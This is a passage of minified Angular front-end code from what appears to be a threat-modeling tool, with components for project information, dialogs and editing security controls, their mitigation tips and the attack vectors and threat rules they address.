"),ne(13,ake,2,3,"ng-template",3),s(14,"\n      "),it(15,"app-model-tasks"),s(16,"\n    "),u(),s(17,"\n    "),m(18,"mat-tab"),s(19,"\n      "),ne(20,nke,2,3,"ng-template",3),s(21,"\n      "),it(22,"app-model-changes",null,5),s(24,"\n    "),u(),s(25,"\n    "),m(26,"mat-tab"),s(27,"\n      "),ne(28,oke,2,3,"ng-template",3),s(29,"\n      "),m(30,"h4"),s(31),oe(32,"translate"),u(),s(33,"\n      "),it(34,"app-progress-tracker"),s(35,"\n    "),u(),s(36,"\n  "),u(),s(37,"\n"),u()}if(2&t){const e=B();C(2),V("selectedIndex",e.GetSelectedTabIndex()),C(29),za("",re(32,3,"status-bar.progress"),": ",e.GetProgress(),"")}}let w5=(()=>{class t{constructor(e,i,n,r){this.dataService=e,this.theme=i,this.dialog=n,this.locStorage=r,this.refreshNodes=new Tt}ngOnInit(){this.GHProject=this.dataService.SelectedFile,this.Project=this.dataService.Project,this.dataService.GetGHProjectHistory().then(e=>this.commits=e)}OnFileSelected(e){return function(t,a,e,i){return new(e||(e=Promise))(function(r,c){function d(q){try{k(i.next(q))}catch(Y){c(Y)}}function T(q){try{k(i.throw(q))}catch(Y){c(Y)}}function k(q){q.done?r(q.value):function n(r){return r instanceof e?r:new e(function(c){c(r)})}(q.value).then(d,T)}k((i=i.apply(t,a||[])).next())})}(this,void 0,void 0,function*(){if(e.target.files&&e.target.files[0]){const i={maxSizeMB:1,maxWidthOrHeight:700,useWebWorker:!0};try{const n=yield(0,FG.Z)(e.target.files[0],i);let r=new FileReader;r.readAsDataURL(n),r.onload=c=>{this.Project.Image=c.target.result.toString()}}catch(n){console.log(n)}}})}ViewImage(e){this.dialog.OpenViewImageDialog(e)}AddUser(){this.Project.Participants.push({Name:Gi.FindUniqueName("Participant",this.Project.Participants.map(e=>e.Name)),Email:""}),this.selectedUser=this.Project.Participants[this.Project.Participants.length-1]}DeleteUser(e){const i=this.Project.Participants.indexOf(e);i>=0&&(this.Project.Participants.splice(i,1),this.selectedUser==e&&(this.selectedUser=null))}OnTestingChanged(e){e.checked?(this.Project.CreateTesting(),this.refreshNodes.emit()):this.dialog.OpenDeleteObjectDialog(this.Project.GetTesting()).subscribe(i=>{i?(this.Project.DeleteTesting(),this.refreshNodes.emit()):e.source.checked=!0})}GetRemoveBtnLeft(e){return!e||e.width<25?"25px":(e.width-25).toString()+"px"}GetProgress(){if(this.dataService.Project){let e=Object.values(this.dataService.Project.ProgressTracker);return 0==e.length?"0%":(100*e.filter(i=>1==i).length/e.length).toFixed(0)+"%"}}GetSelectedTabIndex(){let e=this.locStorage.Get(si.PAGE_MODELING_MODEL_TAB_INDEX);return null!=e?e:0}SetSelectedTabIndex(e){this.locStorage.Set(si.PAGE_MODELING_MODEL_TAB_INDEX,e)}}return t.\u0275fac=function(e){return new(e||t)(Ee(Yi),Ee(Oa),Ee(Wn),Ee(_r))},t.\u0275cmp=Wt({type:t,selectors:[["app-model-info"]],outputs:{refreshNodes:"refreshNodes"},decls:1,vars:1,consts:[["style","margin: 0 10px;",4,"ngIf"],[2,"margin","0 10px"],["dynamicHeight","",3,"selectedIndex","selectedIndexChange","selectedTabChange"],["mat-tab-label",""],["matTabContent",""],["changes",""],[1,"row"],[1,"col1"],["appearance","fill",2,"width","350px"],["matInput","","cdkTextareaAutosize","","cdkAutosizeMinRows","3",3,"spellcheck","ngModel","ngModelChange"],["matInput","",3,"spellcheck","ngModel","ngModelChange"],[1,"col2"],[1,"imgContainer"],[3,"src","click"],["projImg",""],["type","file","accept","image/*",1,"fileInput",3,"change"],["fileUpload",""],["class","removeBtn",3,"left",4,"ngIf"],[1,"uploadBtn"],["mat-mini-fab","","color","primary",3,"click"],[1,"column1"],[1,"prop-list"],["mat-subheader",""],["mat-icon-button","","matTooltipShowDelay","1000",2,"margin-left","15px",3,"matTooltip","click"],["matTooltipShowDelay","1000",3,"highlight-light","highlight-dark","matTooltip","click",4,"ngFor","ngForOf"],[1,"column2"],["style","margin: 10px 0 10px 10px",4,"ngIf"],[2,"margin-left","20px","margin-bottom","15px"],["color","primary",3,"checked","change"],["color","primary",3,"ngModel","ngModelChange"],[1,"expansion-panel-headers-align"],[4,"ngIf"],[1,"removeBtn"],["mat-icon-button","","color","primary",3,"click"],["matTooltipShowDelay","1000",3,"matTooltip","click"],["mat-list-icon",""],["mat-line",""],[1,"primary-color",3,"href"],["mat-icon-button","","matTooltipShowDelay","1000",2,"margin-left","auto",3,"matTooltip","click"],[2,"margin","10px 0 10px 10px"],["appearance","fill",1,"property-form-field"],["matSuffix","","mat-icon-button","","matTooltipShowDelay","1000",3,"matTooltip","click",4,"ngIf"],["matInput","",3,"ngModel","ngModelChange"],["matSuffix","","mat-icon-button","","matTooltipShowDelay","1000",3,"matTooltip","click"],["matExpansionPanelContent",""],[4,"ngFor","ngForOf"],[2,"text-align","right"],["mat-icon-button","","matTooltipShowDelay","1000",2,"width","20px","height","20px","line-height","20px",3,"matTooltip","click"]],template:function(e,i){1&e&&ne(0,rke,38,5,"div",0),2&e&&V("ngIf",!!i.Project)},styles:['.primary-color[_ngcontent-%COMP%]{color:#2196f3!important}.primary-background[_ngcontent-%COMP%]{background-color:#2196f3!important}.bg-color-light1[_ngcontent-%COMP%], .splitter-light2[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light1[_ngcontent-%COMP%]     .as-split-gutter{background-color:#e7e5e5!important}.bg-color-light2[_ngcontent-%COMP%]{background-color:#f5f5f5!important}.bg-color-light3[_ngcontent-%COMP%]{background-color:#fff!important}.bg-color-dark1[_ngcontent-%COMP%], .splitter-dark2[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%]     .as-split-gutter{background-color:#333!important}.bg-color-dark2[_ngcontent-%COMP%]{background-color:#252525!important}.bg-color-dark3[_ngcontent-%COMP%]{background-color:#1e1e1e!important}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter{position:relative}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon{background-image:none!important;transition:opacity .3s;opacity:0;position:absolute}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover{opacity:1;background-color:#2196f3}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon{background-color:#2196f3;opacity:1}.column1[_ngcontent-%COMP%]{float:left;width:350px}.column2[_ngcontent-%COMP%]{float:left;width:calc(100% - 350px)}.prop-list[_ngcontent-%COMP%]   .mat-list-item[_ngcontent-%COMP%]{height:48px;cursor:pointer}.prop-list[_ngcontent-%COMP%]     .mat-list-item-content{padding:0 8px!important}.prop-list[_ngcontent-%COMP%]     .mat-list-text{padding-left:8px!important}.prop-list[_ngcontent-%COMP%]   .mat-subheader[_ngcontent-%COMP%]{display:contents}.prop-list-light[_ngcontent-%COMP%]{border-right:1px solid rgba(0,0,0,.1)}.prop-list-dark[_ngcontent-%COMP%]{border-right:1px solid rgba(255,255,255,.1)}.highlight-light[_ngcontent-%COMP%]{background-color:#0000001a}.highlight-dark[_ngcontent-%COMP%]{background-color:#ffffff1a}.property-form-field[_ngcontent-%COMP%]{width:300px}.reorder-list[_ngcontent-%COMP%]{max-width:100%;display:block;border-radius:4px;overflow:hidden}.reorder-box[_ngcontent-%COMP%]{padding:5px 10px;color:#000000de;display:flex;flex-direction:row;align-items:center;box-sizing:border-box;cursor:move;font-size:14px}.cdk-drag-preview[_ngcontent-%COMP%]{box-sizing:border-box;border-radius:4px;box-shadow:0 5px 5px -3px #0003,0 8px 10px 1px #00000024,0 3px 14px 2px #0000001f}.cdk-drag-placeholder[_ngcontent-%COMP%]{opacity:0}.cdk-drag-animating[_ngcontent-%COMP%]{transition:transform .25s cubic-bezier(0,0,.2,1)}.reorder-box[_ngcontent-%COMP%]:last-child{border:none}.reorder-list.cdk-drop-list-dragging[_ngcontent-%COMP%]   .reorder-box[_ngcontent-%COMP%]:not(.cdk-drag-placeholder){transition:transform .25s cubic-bezier(0,0,.2,1)}.col1[_ngcontent-%COMP%]{float:left;width:350px}.col2[_ngcontent-%COMP%]{float:left;width:calc(100% - 350px)}.row[_ngcontent-%COMP%]{min-width:660px}.row[_ngcontent-%COMP%]:after{content:"";display:table;clear:both}.imgContainer[_ngcontent-%COMP%]{position:relative;margin-left:10px}.imgContainer[_ngcontent-%COMP%]   img[_ngcontent-%COMP%]{max-height:230px;height:auto}.imgContainer[_ngcontent-%COMP%]   .uploadBtn[_ngcontent-%COMP%]{position:absolute;top:25px;left:25px;transform:translate(-50%,-50%);-ms-transform:translate(-50%,-50%)}.imgContainer[_ngcontent-%COMP%]   .removeBtn[_ngcontent-%COMP%]{position:absolute;top:25px;transform:translate(-50%,-50%);-ms-transform:translate(-50%,-50%)}.fileInput[_ngcontent-%COMP%]{display:none}']}),t})();function ske(t,a){if(1&t&&(m(0,"div",4),s(1),u()),2&t){const e=B();C(1),ct("\n    ",e.data.textContent,"\n  ")}}function cke(t,a){1&t&&Ir(0)}function lke(t,a){if(1&t&&(bt(0),ne(1,cke,1,0,"ng-container",5),Mt()),2&t){const e=B();C(1),V("ngComponentOutlet",e.data.component)("ngComponentOutletInjector",e.dataInjector)}}function dke(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n    "),m(2,"button",6),he("click",function(){return be(e),Me(B().data.onPrevious())}),s(3),oe(4,"translate"),u(),s(5,"\n    "),m(6,"button",6),he("click",function(){return be(e),Me(B().data.onNext())}),s(7),oe(8,"translate"),u(),s(9,"\n  "),Mt()}if(2&t){const e=B();C(2),V("disabled",!e.data.canPrevious()),C(1),ke(re(4,4,"tour.prev")),C(3),V("disabled",!e.data.canNext()),C(1),ke(re(8,6,"tour.next"))}}function mke(t,a){if(1&t&&(m(0,"button",9),s(1),u()),2&t){const e=B(2);C(1),ke(e.data.resultFalseText)}}function uke(t,a){if(1&t&&(bt(0),s(1,"\n    "),m(2,"button",7),s(3),u(),s(4,"\n    "),ne(5,mke,2,1,"button",8),s(6,"\n  "),Mt()),2&t){const e=B();C(2),V("disabled",!e.data.resultTrueEnabled())("mat-dialog-close",!0),C(1),ke(e.data.resultTrueText),C(2),V("ngIf",e.data.hasResultFalse)}}function hke(t,a){if(1&t&&(m(0,"button",12),s(1),u()),2&t){const e=B(2);C(1),ke(e.data.resultFalseText)}}function fke(t,a){if(1&t&&(bt(0),s(1,"\n    "),m(2,"button",10),s(3),u(),s(4,"\n    "),ne(5,hke,2,1,"button",11),s(6,"\n  "),Mt()),2&t){const e=B();C(2),V("disabled",!e.data.resultTrueEnabled())("mat-dialog-close",!0),C(1),ke(e.data.resultTrueText),C(2),V("ngIf",e.data.hasResultFalse)}}let _M=(()=>{class t{constructor(e,i,n){this.dialogRef=e,this.data=i,this.injector=n}ngOnInit(){if(this.data.component&&this.data.componentInputData){let e=[];this.data.componentInputData.forEach(i=>{e.push({provide:i.Key,useValue:i.Value})}),this.dataInjector=Ko.create({providers:e,parent:this.injector})}}onKeyDown(e){var i;this.data.canIterate&&!["INPUT","TEXTAREA"].includes(null===(i=document.activeElement)||void 0===i?void 0:i.tagName)&&("ArrowRight"==e.key&&this.data.canNext()?(e.preventDefault(),e.stopPropagation(),this.data.onNext()):"ArrowLeft"==e.key&&this.data.canPrevious()&&(e.preventDefault(),e.stopPropagation(),this.data.onPrevious()))}}return t.\u0275fac=function(e){return new(e||t)(Ee(Gh),Ee(gp),Ee(Ko))},t.\u0275cmp=Wt({type:t,selectors:[["app-two-options-dialog"]],hostBindings:function(e,i){1&e&&he("keydown",function(r){return i.onKeyDown(r)},0,Qc)},decls:18,vars:6,consts:[["mat-dialog-title",""],["style","white-space: pre-line",4,"ngIf"],[4,"ngIf"],["align","end"],[2,"white-space","pre-line"],[4,"ngComponentOutlet","ngComponentOutletInjector"],["mat-button","",3,"disabled","click"],["mat-button","","cdkFocusInitial","",3,"disabled","mat-dialog-close"],["mat-button","","mat-dialog-close","",4,"ngIf"],["mat-button","","mat-dialog-close",""],["mat-button","",3,"disabled","mat-dialog-close"],["mat-button","","mat-dialog-close","","cdkFocusInitial","",4,"ngIf"],["mat-button","","mat-dialog-close","","cdkFocusInitial",""]],template:function(e,i){1&e&&(m(0,"h2",0),s(1),u(),s(2,"\n"),m(3,"mat-dialog-content"),s(4,"\n  "),ne(5,ske,2,1,"div",1),s(6,"\n  "),ne(7,lke,2,2,"ng-container",2),s(8,"\n"),u(),s(9,"\n"),m(10,"mat-dialog-actions",3),s(11,"\n  "),ne(12,dke,10,8,"ng-container",2),s(13,"\n  "),ne(14,uke,7,4,"ng-container",2),s(15,"\n  "),ne(16,fke,7,4,"ng-container",2),s(17,"\n"),u()),2&e&&(C(1),ke(i.data.title),C(4),V("ngIf",i.data.textContent),C(2),V("ngIf",i.data.component),C(5),V("ngIf",i.data.canIterate),C(2),V("ngIf",1==i.data.initalTrue),C(2),V("ngIf",0==i.data.initalTrue))},dependencies:[hP,Ri,da,vm,Am,Tm,Em,Xi]}),t})();function pke(t,a){if(1&t){const e=Ye();m(0,"button",19),he("click",function(){return be(e),Me(B(3).control.Name="")}),oe(1,"translate"),s(2,"\n      "),m(3,"mat-icon"),s(4,"close"),u(),s(5,"\n    "),u()}2&t&&at("matTooltip",re(1,1,"general.Clear"))}function _ke(t,a){if(1&t){const e=Ye();m(0,"mat-form-field",16),s(1,"\n    "),m(2,"mat-label"),s(3),oe(4,"translate"),u(),s(5,"\n    "),m(6,"input",17),he("ngModelChange",function(n){return be(e),Me(B(2).control.Name=n)}),u(),s(7,"\n    "),ne(8,pke,6,3,"button",18),s(9,"\n  "),u()}if(2&t){const e=B(2);C(3),ke(re(4,4,"properties.Name")),C(3),V("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.control.Name),C(2),V("ngIf",e.control.Name)}}function gke(t,a){if(1&t&&(m(0,"mat-option",22),s(1),u()),2&t){const e=a.$implicit;V("value",e),C(1),ct("\n        ",e.Name,"\n      ")}}function Cke(t,a){if(1&t){const e=Ye();m(0,"mat-form-field",16),s(1,"\n    "),m(2,"mat-label"),s(3),oe(4,"translate"),u(),s(5,"\n    "),m(6,"mat-select",20),he("selectionChange",function(n){return be(e),Me(B(2).OnControlGroupChanged(n))}),s(7,"\n      "),ne(8,gke,2,2,"mat-option",21),s(9,"\n    "),u(),s(10,"\n  "),u()}if(2&t){const e=B(2);let i;C(3),ke(re(4,4,"general.Group")),C(3),at("matTooltip",null==(i=e.GetControlGroup())?null:i.Name),V("value",e.GetControlGroup()),C(2),V("ngForOf",e.GetControlGroups())}}function yke(t,a){if(1&t&&(m(0,"mat-option",22),s(1),u()),2&t){const e=a.$implicit;V("value",e),C(1),ct("\n          ",e.Name,"\n        ")}}function bke(t,a){if(1&t&&(m(0,"mat-optgroup",23),s(1,"\n        "),ne(2,yke,2,2,"mat-option",21),s(3,"\n      "),u()),2&t){const e=a.$implicit;V("label",e.Name),C(2),V("ngForOf",e.AttackVectors)}}function Mke(t,a){if(1&t&&(m(0,"mat-option",22),s(1),u()),2&t){const e=a.$implicit;V("value",e),C(1),ct("\n          ",e.Name,"\n        ")}}function vke(t,a){if(1&t&&(m(0,"mat-optgroup",23),s(1,"\n        "),ne(2,Mke,2,2,"mat-option",21),s(3,"\n      "),u()),2&t){const e=a.$implicit;V("label",e.Name),C(2),V("ngForOf",e.ThreatRules)}}function Ake(t,a){if(1&t){const e=Ye();m(0,"mat-list-item",24),he("click",function(){const r=be(e).$implicit;return Me(B(2).selectedMitigationTip=r)}),s(1,"\n          "),m(2,"mat-icon",25),s(3,"arrow_right"),u(),s(4,"\n          "),m(5,"div",26),s(6),oe(7,"translate"),u(),s(8,"\n          "),m(9,"div",26),s(10),oe(11,"translate"),u(),s(12,"\n          "),m(13,"button",27),he("click",function(){const r=be(e).$implicit;return Me(B(2).DeleteTip(r))}),oe(14,"translate"),m(15,"mat-icon"),s(16,"delete"),u()(),s(17,"\n        "),u()}if(2&t){const e=a.$implicit,i=B(2);Ct("highlight-light",i.selectedMitigationTip===e&&!i.theme.IsDarkMode)("highlight-dark",i.selectedMitigationTip===e&&i.theme.IsDarkMode),at("matTooltip",e.Name),C(6),ke(re(7,9,e.Name)),C(4),za("",re(11,11,"properties.LifeCycles"),": ",i.GetLifeCycleNames(e),""),C(3),at("matTooltip",re(14,13,"general.Delete"))}}function Tke(t,a){if(1&t){const e=Ye();m(0,"button",19),he("click",function(){return be(e),Me(B(3).selectedMitigationTip.Name="")}),oe(1,"translate"),s(2,"\n            "),m(3,"mat-icon"),s(4,"close"),u(),s(5,"\n          "),u()}2&t&&at("matTooltip",re(1,1,"general.Clear"))}function Eke(t,a){if(1&t&&(m(0,"td",33),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=B(3);C(1),ke(re(2,1,i.GetLifeCycleName(e)))}}function Dke(t,a){if(1&t){const e=Ye();m(0,"td",30)(1,"mat-checkbox",34),he("change",function(n){const c=be(e).$implicit;return Me(B(3).SetLifeCycle(c,n))}),u()()}if(2&t){const e=a.$implicit,i=B(3);C(1),V("checked",i.ContainsLifeCycle(e))}}function xke(t,a){if(1&t){const e=Ye();m(0,"div",28),s(1,"\n        "),m(2,"mat-form-field",16),s(3,"\n          "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n          "),m(8,"input",17),he("ngModelChange",function(n){return be(e),Me(B(2).selectedMitigationTip.Name=n)}),u(),s(9,"\n          "),ne(10,Tke,6,3,"button",18),s(11,"\n        "),u(),s(12,"\n        "),m(13,"mat-form-field",2),s(14,"\n          "),m(15,"mat-label"),s(16),oe(17,"translate"),u(),s(18,"\n          "),m(19,"textarea",3),he("ngModelChange",function(n){return be(e),Me(B(2).selectedMitigationTip.Description=n)}),u(),s(20,"\n        "),u(),s(21,"\n        "),m(22,"table",29),s(23,"\n          "),m(24,"tr"),s(25,"\n            "),m(26,"td",30)(27,"strong"),s(28),oe(29,"translate"),u()(),s(30,"\n            "),ne(31,Eke,3,3,"td",31),s(32,"\n          "),u(),s(33,"\n          "),m(34,"tr"),s(35,"\n            "),m(36,"td",30)(37,"strong"),s(38),oe(39,"translate"),u()(),s(40,"\n            "),ne(41,Dke,2,1,"td",32),s(42,"\n          "),u(),s(43,"\n        "),u(),s(44,"\n      "),u()}if(2&t){const e=B(2);C(5),ke(re(6,11,"properties.Name")),C(3),V("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.selectedMitigationTip.Name),C(2),V("ngIf",e.selectedMitigationTip.Name),C(6),ke(re(17,13,"properties.Description")),C(3),V("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.selectedMitigationTip.Description),C(9),ke(re(29,15,"pages.config.control.control")),C(3),V("ngForOf",e.GetLifeCycles()),C(7),ke(re(39,17,"pages.config.control.during")),C(3),V("ngForOf",e.GetLifeCycles())}}function wke(t,a){if(1&t&&(s(0,"\n        "),it(1,"app-attack-vector",36),s(2,"\n      ")),2&t){const e=B().$implicit;C(1),V("canEdit",!1)("attackVector",e)}}function Ike(t,a){if(1&t&&(m(0,"mat-expansion-panel"),s(1,"\n      "),m(2,"mat-expansion-panel-header"),s(3,"\n        "),m(4,"mat-panel-title"),s(5),oe(6,"translate"),u(),s(7,"\n        "),m(8,"mat-panel-description"),s(9),m(10,"mat-icon"),s(11,"info"),u(),s(12,"\n        "),u(),s(13,"\n      "),u(),s(14,"\n      "),ne(15,wke,3,2,"ng-template",35),s(16,"\n    "),u()),2&t){const e=a.$implicit;C(5),ct("\n          ",re(6,2,"properties.MitigatedAttackVector"),"\n        "),C(4),ct("\n          ",null==e?null:e.GetProperty("Name"),"\n          ")}}function Rke(t,a){if(1&t&&(s(0,"\n        "),it(1,"app-threat-rule",37),s(2,"\n      ")),2&t){const e=B().$implicit;C(1),V("canEdit",!1)("threatRule",e)}}function Ske(t,a){if(1&t&&(m(0,"mat-expansion-panel"),s(1,"\n      "),m(2,"mat-expansion-panel-header"),s(3,"\n        "),m(4,"mat-panel-title"),s(5),oe(6,"translate"),u(),s(7,"\n        "),m(8,"mat-panel-description"),s(9),m(10,"mat-icon"),s(11,"info"),u(),s(12,"\n        "),u(),s(13,"\n      "),u(),s(14,"\n      "),ne(15,Rke,3,2,"ng-template",35),s(16,"\n    "),u()),2&t){const e=a.$implicit;C(5),ct("\n          ",re(6,2,"properties.MitigatedThreatRule"),"\n        "),C(4),ct("\n          ",null==e?null:e.GetProperty("Name"),"\n          ")}}function kke(t,a){if(1&t){const e=Ye();m(0,"div"),s(1,"\n  "),ne(2,_ke,10,6,"mat-form-field",1),s(3,"\n  "),m(4,"mat-form-field",2),s(5,"\n    "),m(6,"mat-label"),s(7),oe(8,"translate"),u(),s(9,"\n    "),m(10,"textarea",3),he("ngModelChange",function(n){return be(e),Me(B().control.Description=n)}),u(),s(11,"\n  "),u(),s(12,"\n  "),ne(13,Cke,11,6,"mat-form-field",1),s(14,"\n  "),m(15,"mat-form-field",2),s(16,"\n    "),m(17,"mat-label"),s(18),oe(19,"translate"),u(),s(20,"\n    "),m(21,"mat-select",4),he("valueChange",function(n){return be(e),Me(B().control.MitigatedAttackVectors=n)}),s(22,"\n      "),ne(23,bke,4,2,"mat-optgroup",5),s(24,"\n    "),u(),s(25,"\n  "),u(),s(26,"\n  "),m(27,"mat-form-field",2),s(28,"\n    "),m(29,"mat-label"),s(30),oe(31,"translate"),u(),s(32,"\n    "),m(33,"mat-select",4),he("valueChange",function(n){return be(e),Me(B().control.MitigatedThreatRules=n)}),s(34,"\n      "),ne(35,vke,4,2,"mat-optgroup",5),s(36,"\n    "),u(),s(37,"\n  "),u(),s(38,"\n  "),m(39,"div",6),s(40,"\n    "),m(41,"div",7),s(42,"\n      "),m(43,"mat-list",8),he("cdkDropListDropped",function(n){be(e);const r=B();return Me(r.drop(n,r.control.MitigationTips))}),s(44,"\n        "),m(45,"div",9),s(46),oe(47,"translate"),m(48,"button",10),he("click",function(){return be(e),Me(B().AddTip())}),oe(49,"translate"),m(50,"mat-icon"),s(51,"add"),u()()(),s(52,"\n        "),ne(53,Ake,18,15,"mat-list-item",11),s(54,"\n      "),u(),s(55,"\n    "),u(),s(56,"\n    "),m(57,"div",12),s(58,"\n      "),ne(59,xke,45,19,"div",13),s(60,"\n    "),u(),s(61,"\n  "),u(),s(62,"\n  "),it(63,"br"),s(64,"\n  "),m(65,"mat-accordion",14),s(66,"\n    "),ne(67,Ike,17,4,"mat-expansion-panel",15),s(68,"\n    "),ne(69,Ske,17,4,"mat-expansion-panel",15),s(70,"\n  "),u(),s(71,"\n  "),it(72,"br"),s(73,"\n"),u()}if(2&t){const e=B();Ct("disable",!e.canEdit),C(2),V("ngIf",e.canEditName),C(5),ke(re(8,24,"properties.Description")),C(3),V("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.control.Description),C(3),V("ngIf",e.canEditGroup),C(5),ke(re(19,26,"properties.MitigatedAttackVectors")),C(3),V("value",e.control.MitigatedAttackVectors),C(2),V("ngForOf",e.GetAvailableAttackVectorGroups()),C(7),ke(re(31,28,"properties.MitigatedThreatRules")),C(3),V("value",e.control.MitigatedThreatRules),C(2),V("ngForOf",e.GetAvailableThreatRuleGroups()),C(8),Ct("prop-list-light",!e.theme.IsDarkMode)("prop-list-dark",e.theme.IsDarkMode),C(3),za("",e.control.Name," ",re(47,30,"general.Tips")," "),C(2),at("matTooltip",re(49,32,"general.Add")),C(5),V("ngForOf",e.control.MitigationTips),C(6),V("ngIf",e.selectedMitigationTip),C(8),V("ngForOf",e.control.MitigatedAttackVectors),C(2),V("ngForOf",e.control.MitigatedThreatRules)}}let T2=(()=>{class t{constructor(e,i,n,r,c,d){this.theme=n,this.dataService=r,this.dialog=c,this.translate=d,this.canEdit=!0,this.canEditName=!1,this.canEditGroup=!1,this.attackVectorGroups=null,this.threatRuleGroups=null,e&&(this.control=e,this.canEdit=!1),null!=i&&(this.canEdit=this.canEditName=this.canEditGroup=i.Value)}get control(){return this._control}set control(e){this._control=e,this.attackVectorGroups=null,this.selectedMitigationTip=null}ngOnInit(){}GetAvailableAttackVectorGroups(){if(null!=this.attackVectorGroups)return this.attackVectorGroups;this.attackVectorGroups=[];let e=i=>{var n,r;(null===(n=i.AttackVectors)||void 0===n?void 0:n.length)>0&&this.attackVectorGroups.push({Name:i.Name,AttackVectors:i.AttackVectors}),(null===(r=i.SubGroups)||void 0===r?void 0:r.length)>0&&i.SubGroups.forEach(c=>e(c))};return e(this.dataService.Config.ThreatLibrary),this.attackVectorGroups}GetAvailableThreatRuleGroups(){if(null!=this.threatRuleGroups)return this.threatRuleGroups;this.threatRuleGroups=[];let e=i=>{var n,r;(null===(n=i.ThreatRules)||void 0===n?void 0:n.length)>0&&this.threatRuleGroups.push({Name:i.Name,ThreatRules:i.ThreatRules}),(null===(r=i.SubGroups)||void 0===r?void 0:r.length)>0&&i.SubGroups.forEach(c=>e(c))};return this.dataService.Config.GetThreatRuleGroups().forEach(i=>e(i)),this.threatRuleGroups}GetControlGroups(){return this.dataService.Config.GetControlGroups()}GetControlGroup(){return this.dataService.Config.FindGroupOfControl(this.control)}OnControlGroupChanged(e){let i=this.dataService.Config.FindGroupOfControl(this.control);i&&i.RemoveControl(this.control),e.value.AddControl(this.control)}AddTip(){this.control.MitigationTips.push({Name:Gi.FindUniqueName("Tip",this.control.MitigationTips.map(e=>e.Name)),Description:"",LifeCycles:[]}),this.selectedMitigationTip=this.control.MitigationTips[this.control.MitigationTips.length-1]}DeleteTip(e){const i=this.control.MitigationTips.indexOf(e);i>=0&&(this.control.MitigationTips.splice(i,1),e==this.selectedMitigationTip&&(this.selectedMitigationTip=null))}drop(e,i){Qs(i,e.previousIndex,e.currentIndex)}ContainsLifeCycle(e){return this.selectedMitigationTip.LifeCycles.includes(e)}SetLifeCycle(e,i){i.checked?this.selectedMitigationTip.LifeCycles.push(e):this.selectedMitigationTip.LifeCycles.splice(this.selectedMitigationTip.LifeCycles.findIndex(n=>n==e),1)}GetLifeCycleNames(e){return 0==e.LifeCycles.length?"-":e.LifeCycles.map(i=>this.translate.instant(this.GetLifeCycleName(i))).join(", ")}GetLifeCycles(){return y2.GetMitigationKeys()}GetLifeCycleName(e){return y2.ToString(e)}}return t.\u0275fac=function(e){return new(e||t)(Ee(Fg,8),Ee(ff,8),Ee(Oa),Ee(Yi),Ee(Wn),Ee(Sn))},t.\u0275cmp=Wt({type:t,selectors:[["app-control"]],inputs:{node:"node",control:"control",canEdit:"canEdit",canEditName:"canEditName",canEditGroup:"canEditGroup"},decls:1,vars:1,consts:[[3,"disable",4,"ngIf"],["appearance","fill","class","property-form-field",4,"ngIf"],["appearance","fill",2,"width","100%"],["matInput","","cdkTextareaAutosize","","cdkAutosizeMinRows","2","cdkAutosizeMaxRows","5",3,"spellcheck","ngModel","ngModelChange"],["multiple","",3,"value","valueChange"],[3,"label",4,"ngFor","ngForOf"],[1,"row"],[1,"column1"],["cdkDropList","",1,"prop-list","reorder-list",3,"cdkDropListDropped"],["mat-subheader",""],["mat-icon-button","","matTooltipShowDelay","1000",2,"margin-left","15px",3,"matTooltip","click"],["cdkDrag","","matTooltipShowDelay","1000",3,"highlight-light","highlight-dark","matTooltip","click",4,"ngFor","ngForOf"],[1,"column2"],["style","margin: 10px 0 10px 